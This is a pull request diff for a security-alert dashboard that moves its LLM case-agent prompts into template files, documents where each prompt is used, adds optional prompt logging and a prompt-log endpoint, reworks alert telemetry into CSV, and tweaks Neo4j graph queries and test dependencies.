### PR TITLE
prompts: move to template files, add test coverage, fix payload shapes

### DIFF
--- a/.migration.json
+++ b/.migration.json
@@ -1,0 +1,54 @@
+{
+ "DetailsPrompt": {
+  "args": "question: string, details: any",
+  "placeholders": [
+   "details",
+   "question"
+  ],
+  "len": 269
+ },
+ "DetailsSummaryPrompt": {
+  "args": "details: any",
+  "placeholders": [
+   "details"
+  ],
+  "len": 305
+ },
+ "ThreatStatusSummaryPrompt": {
+  "args": "details: any",
+  "placeholders": [
+   "details"
+  ],
+  "len": 478
+ },
+ "ThreatStatusPrompt": {
+  "args": "question: string, details: any",
+  "placeholders": [
+   "details",
+   "question"
+  ],
+  "len": 476
+ },
+ "AlertSummaryPrompt": {
+  "args": "specificDetails: any",
+  "placeholders": [
+   "JSON.stringify(specificDetails)"
+  ],
+  "len": 224
+ },
+ "AlertPrompt": {
+  "args": "question: string, details: any, specificDetails: any",
+  "placeholders": [
+   "question",
+   "JSON.stringify(details)"
+  ],
+  "len": 551
+ },
+ "SummaryOfThreatStatusSummaryPrompt": {
+  "args": "details: any",
+  "placeholders": [
+   "details"
+  ],
+  "len": 163
+ }
+}

--- a/docs/prompt-map.md
+++ b/docs/prompt-map.md
@@ -1,0 +1,87 @@
+# LLM Prompt Map
+
+Where every LLM prompt lives and which page consumes it.
+
+## Two prompt services
+
+There are **two** `PromptService` classes with overlapping prompts:
+
+
+| File                                                                                                              | Status                                                                                                                      |
+| ----------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------- |
+| `[protostar-react/src/services/PromptService.ts](../protostar-react/src/services/PromptService.ts)`               | **Live.** All page-facing prompts. Built client-side, posted to `/askllm` as a raw `question` string.                       |
+| `[protostar-ai-dev-flask-api/services/promptservice.py](../protostar-ai-dev-flask-api/services/promptservice.py)` | **Mostly dead.** Only the two `agent_case_`* methods are called; the other seven are a stale duplicate of the React copies. |
+
+
+Flow for page prompts: React builds the full prompt text → `LLMService.AskLLM()` posts it to `/askllm` → `llmservice.ask_claude()` passes it straight through to the model. Flask never touches its own copies of those seven.
+
+## React prompts — by method
+
+
+| Prompt method                        | Line | Used by               | Call site                                          | Trigger                                                  |
+| ------------------------------------ | ---- | --------------------- | -------------------------------------------------- | -------------------------------------------------------- |
+| `DetailsPrompt`                      | 5    | Details               | `Details.tsx:298`                                  | User types a question about an entity                    |
+| `DetailsSummaryPrompt`               | 13   | Details               | `Details.tsx:125`                                  | Auto-summary of the entity                               |
+| `ThreatStatusSummaryPrompt`          | 21   | **Home**, **Summary** | `Home.tsx:66`, `Summary.tsx:95`, `Summary.tsx:195` | Dashboard load; Summary auto-summary; per-entity summary |
+| `ThreatStatusPrompt`                 | 30   | Summary               | `Summary.tsx:359`                                  | User types a question on Summary                         |
+| `AlertSummaryPrompt`                 | 39   | Alerts                | `Alerts.tsx:179`                                   | Summarize one alert against visible alerts               |
+| `AlertPrompt`                        | 47   | —                     | —                                                  | **Never called**                                         |
+| `SummaryOfThreatStatusSummaryPrompt` | 57   | **Home**, **Summary** | `Home.tsx:74`, `Summary.tsx:101`                   | Second pass condensing the first summary                 |
+
+
+
+
+## React prompts — by page
+
+
+| Page                            | Prompts used                                                                               |
+| ------------------------------- | ------------------------------------------------------------------------------------------ |
+| `Home.tsx`                      | `ThreatStatusSummaryPrompt` → `SummaryOfThreatStatusSummaryPrompt` (chained)               |
+| `Summary.tsx`                   | `ThreatStatusSummaryPrompt` ×2, `SummaryOfThreatStatusSummaryPrompt`, `ThreatStatusPrompt` |
+| `Details.tsx`                   | `DetailsSummaryPrompt`, `DetailsPrompt`                                                    |
+| `Alerts.tsx`                    | `AlertSummaryPrompt` only                                                                  |
+| `Cases.tsx` / `CaseDetails.tsx` | None from this file — server-side `agent_case_*` prompts instead                           |
+
+
+
+
+## What each argument actually holds
+
+The parameter names in `PromptService` are local labels only — `details: any` accepts
+anything, and the calling page decides what it means. The same name carries four
+different kinds of payload:
+
+| Call site | What lands in `details` / `specificDetails` |
+|---|---|
+| `Home.tsx:65` | CSV table of **all** entities (via `FormatEntityTable`) |
+| `Home.tsx:73` | **Prior LLM prose** — not data at all |
+| `Summary.tsx:94`, `Summary.tsx:194` | CSV table of all entities |
+| `Summary.tsx:100` | Prior LLM prose |
+| `Summary.tsx:358` | Question + CSV table of all entities |
+| `Details.tsx:125`, `Details.tsx:298` | JSON of **one** entity's roll-up (values only, keys stripped) |
+| `Alerts.tsx:179` | The **selected alert** object |
+
+Nothing enforces this. The prompt's own English text is the only thing asserting what
+the payload is, so a prompt edit can silently contradict what the page passes — which
+is how the Alerts prompt came to describe a page of alerts as "the overall entity".
+The `data presence` tests in `PromptService.test.ts` are the guard: they assert fixture
+content actually reaches each prompt, using fixtures shaped like the real payloads.
+
+## Flask prompts
+
+
+| Prompt                                    | Route                                                | Page              | Status                                         |
+| ----------------------------------------- | ---------------------------------------------------- | ----------------- | ---------------------------------------------- |
+| `agent_case_comment_prompt`               | `/createcase`, backfill worker (`appservice.py:121`) | `Cases.tsx`       | **Live** — auto-comment when a case is created |
+| `agent_case_question_prompt`              | `/postcasecomment`                                   | `CaseDetails.tsx` | **Live** — reply to an `@agent` comment        |
+| `details_prompt`                          | —                                                    | —                 | Dead                                           |
+| `details_summary_prompt`                  | —                                                    | —                 | Dead                                           |
+| `threat_status_summary`                   | —                                                    | —                 | Dead                                           |
+| `threat_status_prompt`                    | —                                                    | —                 | Dead                                           |
+| `alert_summary_prompt`                    | —                                                    | —                 | Dead                                           |
+| `alert_prompt`                            | —                                                    | —                 | Dead                                           |
+| `summary_of_threat_status_summary_prompt` | —                                                    | —                 | Dead                                           |
+
+
+
+

--- a/protostar-ai-dev-flask-api/agentconfig.ini.template
+++ b/protostar-ai-dev-flask-api/agentconfig.ini.template
@@ -15,3 +15,9 @@ LMStudio=NotRequired
 [Perplexity]
 ModelName=
 PerplexityKey=
+
+[Logging]
+; Write every assembled LLM prompt to logs/prompts.log. Off by default; the
+; prompts embed whole entity tables. Flask does not reload, so restart it
+; after changing this.
+LogPrompts=false

--- a/protostar-ai-dev-flask-api/protostar-ai-dev-flask-api.py
+++ b/protostar-ai-dev-flask-api/protostar-ai-dev-flask-api.py
@@ -1,4 +1,5 @@
 import sys
+import re
 import socket
 import logging
 from logging.handlers import RotatingFileHandler
@@ -253,6 +254,37 @@ def get_api_log():
     logging.getLogger(__name__).exception('Unable to read API log')
     return make_response(jsonify({'error': 'Unable to read API log'}), 500)
 
+@app.route('/promptlog', methods=['GET'])
+@jwt_required()
+@cross_origin()
+def get_prompt_log():
+  # assembled LLM prompts, written by llmservice at each model entry point
+  try:
+    requested_lines = request.args.get('lines', default=500, type=int)
+    line_limit = min(max(requested_lines or 500, 1), 2000)
+    log_file = logdir / 'prompts.log'
+    if not log_file.exists():
+      return jsonify({'lines': [], 'line_count': 0})
+    with log_file.open('r', encoding='utf-8', errors='replace') as stream:
+      lines = [line.rstrip('\r\n') for line in deque(stream, maxlen=line_limit)]
+    # newest first. Entries span many lines, so group on the timestamp header before
+    # reversing -- reversing raw lines would scramble each prompt's own line order.
+    entry_start = re.compile(r'^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')
+    entries, current = [], []
+    for line in lines:
+      if entry_start.match(line) and current:
+        entries.append(current)
+        current = []
+      current.append(line)
+    if current:
+      entries.append(current)
+    entries.reverse()
+    lines = [line for entry in entries for line in entry]
+    return jsonify({'lines': lines, 'line_count': len(lines)})
+  except Exception:
+    logging.getLogger(__name__).exception('Unable to read prompt log')
+    return make_response(jsonify({'error': 'Unable to read prompt log'}), 500)
+
 @app.route('/corazalog', methods=['GET'])
 @jwt_required()
 @cross_origin()
@@ -328,8 +360,8 @@ def create_case():
       return make_response(jsonify({"Exists": investigated_entity}), 200)
     created_case = appservice.create_case(investigated_entity, assigned_user, case_name, case_description, case_priority)
     if appservice.aicommenting:
-      details = telemetryservice.get_raw_entity_details_neo(investigated_entity)
-      prompt = promptservice.agent_case_comment_prompt(details)
+      details = telemetryservice.get_entity_alerts_csv(investigated_entity)
+      prompt = promptservice.agent_case_comment_prompt(details, appservice.get_case(created_case))
       appservice.add_to_case_queue(created_case, prompt, llmservice)
     return make_response(jsonify({"Success": created_case}), 200)
   except Exception as e:
@@ -355,7 +387,7 @@ def post_case_comment():
         question = 'Provide your current assessment of this case.'
       case_details = appservice.get_case(case)
       if case_details:
-        telemetry = telemetryservice.get_raw_entity_details_neo(case_details.get('investigated_entity'))
+        telemetry = telemetryservice.get_entity_alerts_csv(case_details.get('investigated_entity'))
         thread = appservice.load_case_comments(case)
         prompt = promptservice.agent_case_question_prompt(question, case_details, thread, telemetry)
         appservice.add_to_case_queue(case, prompt, llmservice)

--- a/protostar-ai-dev-flask-api/services/appservice.py
+++ b/protostar-ai-dev-flask-api/services/appservice.py
@@ -117,8 +117,8 @@ class AppService:
         logger.info(f'backfill case {case_id}: skipped, AI commenting was turned off mid-backfill')
         continue
       try:
-        details = telemetryservice.get_raw_entity_details_neo(entity)
-        prompt = promptservice.agent_case_comment_prompt(details)
+        details = telemetryservice.get_entity_alerts_csv(entity)
+        prompt = promptservice.agent_case_comment_prompt(details, self.get_case(case_id))
         llmcomment = llmservice.ask_claude(prompt)
         if llmcomment and self.post_case_comment(case_id, 'agent', llmcomment):
           self.set_agent_status(case_id, 'processed')

--- a/protostar-ai-dev-flask-api/services/llmservice.py
+++ b/protostar-ai-dev-flask-api/services/llmservice.py
@@ -1,8 +1,10 @@
 import logging
 import configparser
+from logging.handlers import RotatingFileHandler
 from pathlib import Path
 
 logger = logging.getLogger('llm')
+
 from neo4j import GraphDatabase, RoutingControl
 from langchain_anthropic import ChatAnthropic
 from langchain_core.messages import HumanMessage
@@ -14,6 +16,21 @@ from langchain_core.output_parsers import StrOutputParser
 
 config = configparser.ConfigParser()
 config.read(Path(__file__).parent.parent.absolute() / "agentconfig.ini")
+# Assembled prompts go to their own file rather than api.log: they embed whole
+# entity tables and would bury everything else. propagate=False keeps the bodies
+# out of the root handler. Off unless [Logging] LogPrompts is set; no handler is
+# attached when disabled, so no log file is created.
+logprompts = config.getboolean('Logging', 'LogPrompts', fallback=False)
+promptlogger = logging.getLogger('prompts')
+promptlogger.propagate = False
+promptlogger.setLevel(logging.INFO)
+if logprompts and not promptlogger.handlers:
+  _promptlogdir = Path(__file__).parent.parent.absolute() / "logs"
+  _promptlogdir.mkdir(exist_ok=True)
+  _prompthandler = RotatingFileHandler(_promptlogdir / "prompts.log", maxBytes=5 * 1024 * 1024, backupCount=3, encoding='utf-8')
+  # prompts are multi-line, so entries need a visible rule or they run together
+  _prompthandler.setFormatter(logging.Formatter('%(asctime)s %(message)s\n' + '=' * 90))
+  promptlogger.addHandler(_prompthandler)
 
 class LLMService:
   def __init__(self):
@@ -30,6 +47,8 @@ class LLMService:
 
   def ask_claude(self, question):
     try:
+      if logprompts:
+        promptlogger.info('[claude]\n\n%s\n', question)
       llm = ChatAnthropic(model=config.get('Anthropic', 'ModelName'), api_key=self.anthropickey)
       result = llm.invoke([HumanMessage(content=question)]).content
       return self.content_to_text(result)
@@ -39,6 +58,8 @@ class LLMService:
 
   def ask_sonar(self, question):
     try:
+      if logprompts:
+        promptlogger.info('[sonar]\n\n%s\n', question)
       llm = ChatPerplexity(model=config.get("Perplexity", "ModelName"), api_key=self.sonarkey)
       result = llm.invoke([HumanMessage(content=question)]).content
       return self.content_to_text(result)
@@ -53,6 +74,8 @@ class LLMService:
     # model = LiteLLMModel(model_id="ollama_chat/hermes3:3b", api_base="http://localhost:11434/api/chat", api_key='not-needed', max_tokens=8000)
     # model = OpenAIServerModel(model_id="gemma-3-4b-it-qat", api_base="http://127.0.0.1:1234/v1", api_key="not-needed")
     try:
+      if logprompts:
+        promptlogger.info('[local]\n\n%s\n', question)
       llm = ChatOpenAI(base_url="http://127.0.0.1:1234/v1", api_key="lm-studio", temperature=0.5)
       result = llm.invoke([HumanMessage(content=question)]).content
       return self.content_to_text(result)

--- a/protostar-ai-dev-flask-api/services/promptservice.py
+++ b/protostar-ai-dev-flask-api/services/promptservice.py
@@ -1,4 +1,17 @@
+from pathlib import Path
 from flask import jsonify
+
+PROMPT_DIR = Path(__file__).parent.parent.absolute() / 'prompts'
+
+def render(template_name, values):
+  # Read on every call rather than caching: Flask runs without the reloader, so this
+  # is what lets a prompt edit take effect without restarting the API. An unknown
+  # placeholder is left in place so a typo shows up in the prompt rather than
+  # silently emptying it.
+  text = (PROMPT_DIR / template_name).read_text(encoding='utf-8').strip()
+  for key, value in values.items():
+    text = text.replace('{{%s}}' % key, str(value))
+  return text
 class PromptService:
   def details_prompt(self, question, details):
     finalPrompt = f"""Can you explain the security risks and steps for mitigation using the following data:" "${details}", answer the 
@@ -62,23 +75,9 @@ class PromptService:
     return finalPrompt
   
   def agent_case_question_prompt(self, question, case_details, comments, telemetry):
-    finalPrompt = f"""You are the investigation agent assigned to a security case. Here is the case information: {case_details}.
-    Here is the comment thread on the case so far, newest first (comments from 'agent' are your own earlier comments): {comments}.
-    Here is the raw alert telemetry for the investigated entity: {telemetry}.
-    A user on the case has directed the following question to you: "{question}". Answer the question using the case information, the comment
-    thread, and the telemetry. Be clear, concise, and brief: keep the answer to a single paragraph unless the question specifically asks for
-    a list of steps. Do not repeat the question back and do not include any preamble, just answer it."""
-    return finalPrompt
+    return render('agent-case-question.txt', {
+      'question': question, 'case_details': case_details,
+      'comments': comments, 'telemetry': telemetry })
 
-  def agent_case_comment_prompt(self, details):
-    finalPrompt = f"""Here are some key terms to note for it's importance when making the summary:
-      1. detection_type: is the process of analyzing a security ecosystem at the holistic level to find malicious users, abnormal activity and anything that could compromise a network. Detection Type is built on threat
-        intelligence, which involves tools that are strategic, tactical and operational. Highly evasive cyber threats are the main focus of threat detection and response tools.
-      2. mitre_tactic: Represent the "why" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action. For example, an adversary may want to achieve credential access. Each representing a
-        stage in an adversary's objective, such as Initial Access, Privilege Escalation, or Exfiltration. Each technique is mapped to procedures, detection opportunities, and mitigations.
-      3. entity: An individual person, organization, device, or process that's being investigated.
-      4. timestamp: When the action took place.
-      5. entity_type: Is a grouping of the entities that match a set of filter conditions.
-      6. severity: Is a categorization of the risk and urgency of a vulnerability and the classification of alarm criticality within a monitoring system.
-    Based on the terms above write the summary and make it clear, concise, and brief. Make sure the summary is no longer than four sentences to a paragraph long. Here's the entity to be investigated: ${details}"""
-    return finalPrompt
+  def agent_case_comment_prompt(self, details, case_details):
+    return render('agent-case-comment.txt', { 'details': details, 'case_details': case_details })

--- a/protostar-ai-dev-flask-api/services/telemetryservice.py
+++ b/protostar-ai-dev-flask-api/services/telemetryservice.py
@@ -81,7 +81,7 @@ class TelemetryService:
           WHERE n.view = 2
           MATCH (n)-[:HAS_SEVERITY|NAME_CLUSTER|INCLUDES*..3]->(m:ALERT)
         RETURN DISTINCT
-          substring(n.entity, apoc.text.indexOf(n.entity, '-') + 1) AS entity
+          CASE WHEN n.entity CONTAINS '- ' THEN substring(n.entity, apoc.text.indexOf(n.entity, '- ') + 2) ELSE n.entity END AS entity
         ORDER BY entity ASC
         """).to_data_frame()
       data = result_df.to_json()
@@ -137,17 +137,17 @@ class TelemetryService:
       print(e)
     return data
   
-  def get_raw_entity_details_neo(self, entity):
-    data = []
-    try:
-      neo4j = self.neo4j_driver
-      query = """
+  def get_raw_entity_details_frame(self, entity):
+    # shared by get_raw_entity_details_neo (JSON, for Cases.tsx) and
+    # get_entity_alerts_csv (CSV, for the case agent prompts)
+    neo4j = self.neo4j_driver
+    query = """
         MATCH (n:ENTITY)
           WHERE n.view = 2
           MATCH (n)-[:HAS_SEVERITY|NAME_CLUSTER|INCLUDES*..3]->(m:ALERT)
           where n.entity contains $entity
           RETURN
-              substring(n.entity, apoc.text.indexOf(n.entity, '-') + 1) AS entity,
+              CASE WHEN n.entity CONTAINS '- ' THEN substring(n.entity, apoc.text.indexOf(n.entity, '- ') + 2) ELSE n.entity END AS entity,
               m.detection_type AS detection_type,
               m.mitre_tactic AS mitre_tactic,
               m.name as name,
@@ -167,10 +167,30 @@ class TelemetryService:
               m.dest_port as dest_port
           ORDER BY n.entity ASC
         """
-      result_df = neo4j.query(query, parameters={'entity': entity}).to_data_frame()
-      data = result_df.to_json()
+    return neo4j.query(query, parameters={'entity': entity}).to_data_frame()
+
+  def get_raw_entity_details_neo(self, entity):
+    data = []
+    try:
+      data = self.get_raw_entity_details_frame(entity).to_json()
     except Exception as e:
-      print(e)
+      logger.exception('Unable to read raw entity details')
+    return data
+
+  def get_entity_alerts_csv(self, entity):
+    # Same alerts as get_raw_entity_details_neo, rendered as CSV rather than column-major
+    # JSON: one line per alert, so nothing has to be reconstructed by row index. Columns
+    # that are empty for every alert are dropped. Used by the case agent prompts;
+    # /rawentitydetailsneo still returns JSON because Cases.tsx indexes it by column.
+    data = ''
+    try:
+      result_df = self.get_raw_entity_details_frame(entity)
+      if result_df is None or result_df.empty:
+        return ''
+      populated = [c for c in result_df.columns if not result_df[c].astype(str).str.strip().eq('').all()]
+      data = result_df[populated].to_csv(index=False).strip()
+    except Exception as e:
+      logger.exception('Unable to build entity alert CSV')
     return data
 
   def search_alerts_neo(self, term):
@@ -187,7 +207,7 @@ class TelemetryService:
              OR toLower(m.entity_type) CONTAINS $term
              OR toLower(m.name) CONTAINS $term
              OR toLower(toString(m.severity)) CONTAINS $term
-          WITH n, m, substring(n.entity, apoc.text.indexOf(n.entity, '-') + 1) AS entity_name
+          WITH n, m, CASE WHEN n.entity CONTAINS '- ' THEN substring(n.entity, apoc.text.indexOf(n.entity, '- ') + 2) ELSE n.entity END AS entity_name
           WITH CASE
             WHEN m.guid IS NOT NULL AND m.name IS NOT NULL AND entity_name IS NOT NULL
               THEN [m.guid, m.name, entity_name]
@@ -197,7 +217,7 @@ class TelemetryService:
           WITH alert_key, head(collect({{entity_node: n, alert_node: m}})) AS matched
           WITH matched.entity_node AS n, matched.alert_node AS m
           RETURN
-              substring(n.entity, apoc.text.indexOf(n.entity, '-') + 1) AS entity,
+              CASE WHEN n.entity CONTAINS '- ' THEN substring(n.entity, apoc.text.indexOf(n.entity, '- ') + 2) ELSE n.entity END AS entity,
               m.detection_type AS detection_type,
               m.mitre_tactic AS mitre_tactic,
               m.name as name,

--- a/protostar-neo/src/pages/Dashboard/Experimental/View4.tsx
+++ b/protostar-neo/src/pages/Dashboard/Experimental/View4.tsx
@@ -21,11 +21,7 @@ export function View4()
       body: JSON.stringify({
         statements: [
           {
-            statement: `MATCH (n:ENTITY {view: 1})-[r]->(m {view: 1})
-                        WITH n, count(r) AS count_of_first_layer_nodes
-                        WHERE count_of_first_layer_nodes = 2
-                        MATCH p=(n)-[r*..2]->(m)
-                        RETURN p`,
+            statement: `MATCH (h:ENTITY)-[r]->() WHERE NOT type(r) IN ['AS_SOURCE', 'AS_DEST'] WITH h, collect(DISTINCT type(r)) AS relationshipTypes WHERE size(relationshipTypes) = 2 and h.view = 1 MATCH p=(h)-[r*..2]->() RETURN p`,
           },
         ],
       }),
@@ -48,7 +44,7 @@ export function View4()
         links={network.links ?? []}
         width={"100%"}
         height={"90vh"}
-        strength={-500}
+        strength={-1000}
       />
     </div>
   );

--- a/protostar-neo/src/pages/Dashboard/Experimental/View5.tsx
+++ b/protostar-neo/src/pages/Dashboard/Experimental/View5.tsx
@@ -21,11 +21,7 @@ export function View5()
       body: JSON.stringify({
         statements: [
           {
-            statement: `MATCH (n:ENTITY {view: 1})-[r]->(m {view: 1})
-                        WITH n, count(r) AS count_of_first_layer_nodes
-                        WHERE count_of_first_layer_nodes = 1
-                        MATCH p=(n)-[r*..2]->(m)
-                        RETURN p`,
+            statement: `MATCH (h:ENTITY)-[r]->() WHERE NOT type(r) IN ['AS_SOURCE', 'AS_DEST'] WITH h, collect(DISTINCT type(r)) AS relationshipTypes WHERE size(relationshipTypes) = 1 and h.view = 1 MATCH p=(h)-[r*..2]->() RETURN p`,
           },
         ],
       }),
@@ -48,7 +44,7 @@ export function View5()
         links={network.links ?? []}
         width={"100%"}
         height={"90vh"}
-        strength={-600}
+        strength={-1000}
       />
     </div>
   );

--- a/protostar-neo/src/pages/Dashboard/Experimental/View6.tsx
+++ b/protostar-neo/src/pages/Dashboard/Experimental/View6.tsx
@@ -50,7 +50,7 @@ export function View6()
         links={network.links ?? []}
         width={"100%"}
         height={"95vh"}
-        strength={-3600}
+        strength={-5000}
         labelNodeTypes={['ENTITY', 'HOST']}
         fontSize={25}
         showIp

--- a/protostar-neo/src/pages/Dashboard/View2.tsx
+++ b/protostar-neo/src/pages/Dashboard/View2.tsx
@@ -22,7 +22,7 @@ export function View2()
       body: JSON.stringify({
         statements: [
           {
-            statement: `MATCH (h:ENTITY)-[r]->() WHERE NOT type(r) IN ['AS_SOURCE', 'AS_DEST'] WITH h, collect(DISTINCT type(r)) AS relationshipTypes WHERE size(relationshipTypes) >= 3 and h.view = 1 MATCH p=(h)-[r*..2]->() RETURN p`,
+            statement: `MATCH (h:ENTITY)-[r]->() WHERE NOT type(r) IN ['AS_SOURCE', 'AS_DEST'] WITH h, collect(DISTINCT type(r)) AS relationshipTypes WHERE size(relationshipTypes) = 3 and h.view = 1 MATCH p=(h)-[r*..2]->() RETURN p`,
           },
         ],
       }),

--- a/protostar-react/package-lock.json
+++ b/protostar-react/package-lock.json
@@ -38,7 +38,8 @@
         "globals": "^15.14.0",
         "typescript": "~5.6.2",
         "typescript-eslint": "^8.18.2",
-        "vite": "^6.4.3"
+        "vite": "^6.4.3",
+        "vitest": "^3.2.7"
       }
     },
     "node_modules/@ampproject/remapping": {
@@ -1845,6 +1846,17 @@
         "@babel/types": "^7.28.2"
       }
     },
+    "node_modules/@types/chai": {
+      "version": "5.2.3",
+      "resolved": "https://registry.npmjs.org/@types/chai/-/chai-5.2.3.tgz",
+      "integrity": "sha512-Mw558oeA9fFbv65/y4mHtXDs9bPnFMZAL/jxdPFUpOHHIXX91mcgEHbS5Lahr+pwZFR8A7GQleRWeI6cGFC2UA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/deep-eql": "*",
+        "assertion-error": "^2.0.1"
+      }
+    },
     "node_modules/@types/debug": {
       "version": "4.1.13",
       "resolved": "https://registry.npmjs.org/@types/debug/-/debug-4.1.13.tgz",
@@ -1853,6 +1865,13 @@
       "dependencies": {
         "@types/ms": "*"
       }
+    },
+    "node_modules/@types/deep-eql": {
+      "version": "4.0.2",
+      "resolved": "https://registry.npmjs.org/@types/deep-eql/-/deep-eql-4.0.2.tgz",
+      "integrity": "sha512-c9h9dVVMigMPc4bwTvC5dxqtqJZwQPePsWjPlpSOnojbor6pGqdk541lfA7AqFQr5pB1BRdq0juY9db81BwyFw==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/@types/estree": {
       "version": "1.0.9",
@@ -2243,6 +2262,121 @@
         "vite": "^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0"
       }
     },
+    "node_modules/@vitest/expect": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/expect/-/expect-3.2.7.tgz",
+      "integrity": "sha512-E8eBXaKibuvH2pSZErOjdVb5vF4PbKYcrnluBTYxEk1l/VhhwZg1kZQsdtjq+CsF5CFydf2Rdkz7jDHKSisi3w==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/chai": "^5.2.2",
+        "@vitest/spy": "3.2.7",
+        "@vitest/utils": "3.2.7",
+        "chai": "^5.2.0",
+        "tinyrainbow": "^2.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
+    "node_modules/@vitest/mocker": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-3.2.7.tgz",
+      "integrity": "sha512-Trr0hYO9CM3Wj6ksWHRhK9IZpIY6wTMO5u/MqXurMxT57sWBaOPEtP3Oq60ihZuh5JsiagKfz95OcxdEP6dBrA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@vitest/spy": "3.2.7",
+        "estree-walker": "^3.0.3",
+        "magic-string": "^0.30.17"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      },
+      "peerDependencies": {
+        "msw": "^2.4.9",
+        "vite": "^5.0.0 || ^6.0.0 || ^7.0.0-0"
+      },
+      "peerDependenciesMeta": {
+        "msw": {
+          "optional": true
+        },
+        "vite": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/@vitest/pretty-format": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-3.2.7.tgz",
+      "integrity": "sha512-KUHlwqVu0sRlhCdyPdQ/wBoTfRahjUky1MubOmYw9fWfIZy1gNoHpuaaQBPAaMaVYdQYHJLurzj8ECCj5OwTqA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "tinyrainbow": "^2.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
+    "node_modules/@vitest/runner": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/runner/-/runner-3.2.7.tgz",
+      "integrity": "sha512-sB9y4ovltoQP+WaUPwmSxO9WIg9Ig694Di5PalVPsYHklAdE027mehpWF2SQSVq+k6sFgaivbTjTJwZLSHbedA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@vitest/utils": "3.2.7",
+        "pathe": "^2.0.3",
+        "strip-literal": "^3.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
+    "node_modules/@vitest/snapshot": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/snapshot/-/snapshot-3.2.7.tgz",
+      "integrity": "sha512-7C+MwShwtBSI5Buwoyg3s/iY1eHL9PKAf+O1wVh/TdnjXUtkoL/9YQtre90i4MtNXM6edP1wJ2zOBpfCyhIS7g==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@vitest/pretty-format": "3.2.7",
+        "magic-string": "^0.30.17",
+        "pathe": "^2.0.3"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
+    "node_modules/@vitest/spy": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/spy/-/spy-3.2.7.tgz",
+      "integrity": "sha512-Q2eQGI6d2L/hBtZ0qNuKcAGid68XK6cv1xsoaIma6PaJhHPoqcEJhYpXZ/5myCMqkNgtP6UKuBhbc0nHKnrkuQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "tinyspy": "^4.0.3"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
+    "node_modules/@vitest/utils": {
+      "version": "3.2.7",
+      "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-3.2.7.tgz",
+      "integrity": "sha512-x6BDOd7dyo3PFLY3I9/HJ25X/6OurhGXk2/B9gOZNPF7XDVjeBK4k01lQE5uvDpbuheErh91qYuE1E2OEjK3Rw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@vitest/pretty-format": "3.2.7",
+        "loupe": "^3.1.4",
+        "tinyrainbow": "^2.0.0"
+      },
+      "funding": {
+        "url": "https://opencollective.com/vitest"
+      }
+    },
     "node_modules/acorn": {
       "version": "8.15.0",
       "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.15.0.tgz",
@@ -2317,6 +2451,16 @@
       "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==",
       "dev": true,
       "license": "Python-2.0"
+    },
+    "node_modules/assertion-error": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-2.0.1.tgz",
+      "integrity": "sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=12"
+      }
     },
     "node_modules/asynckit": {
       "version": "0.4.0",
@@ -2434,6 +2578,16 @@
         "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7"
       }
     },
+    "node_modules/cac": {
+      "version": "6.7.14",
+      "resolved": "https://registry.npmjs.org/cac/-/cac-6.7.14.tgz",
+      "integrity": "sha512-b6Ilus+c3RrdDk+JhLKUAQfzzgLEPy6wcXqS7f/xe1EETvsDP6GORG7SFuOs6cID5YkqchW/LXZbX5bc8j7ZcQ==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=8"
+      }
+    },
     "node_modules/call-bind-apply-helpers": {
       "version": "1.0.2",
       "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz",
@@ -2486,6 +2640,23 @@
       "funding": {
         "type": "github",
         "url": "https://github.com/sponsors/wooorm"
+      }
+    },
+    "node_modules/chai": {
+      "version": "5.3.3",
+      "resolved": "https://registry.npmjs.org/chai/-/chai-5.3.3.tgz",
+      "integrity": "sha512-4zNhdJD/iOjSH0A05ea+Ke6MU5mmpQcbQsSOkgdaUMJ9zTlDTD/GYlwohmIE2u0gaxHYiVHEn1Fw9mZ/ktJWgw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "assertion-error": "^2.0.1",
+        "check-error": "^2.1.1",
+        "deep-eql": "^5.0.1",
+        "loupe": "^3.1.0",
+        "pathval": "^2.0.0"
+      },
+      "engines": {
+        "node": ">=18"
       }
     },
     "node_modules/chalk": {
